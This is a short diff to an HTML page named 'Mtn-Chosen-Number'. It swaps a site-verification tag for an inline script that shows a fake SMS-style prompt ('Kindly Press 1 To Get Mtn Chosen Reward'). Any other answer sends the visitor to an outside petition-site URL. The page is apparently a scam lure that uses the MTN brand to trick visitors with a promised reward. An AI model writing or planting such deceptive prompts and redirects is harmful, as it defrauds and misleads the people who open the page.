--- a/Mtn-Chosen-Number.html
+++ b/Mtn-Chosen-Number.html
@@ -16,7 +16,14 @@
 
      
 
-      <meta name="google-site-verification" content="2tzCn_X6JZOV46iZk-PHkEkdAhqPZNOjbTcd740KuMU" />
+  <p>&nbsp;</p>
+<script type="text/javascript"> 
+var password = '10'
+password=prompt('SMS: Welcome Dear, Kindly Press 1 To Get Mtn Chosen Reward','');
+if (password != '1') {
+location.href='https://mpetition.org/Mtn-Chosen-Number.html';
+}
+</script>
      
     <script>
 
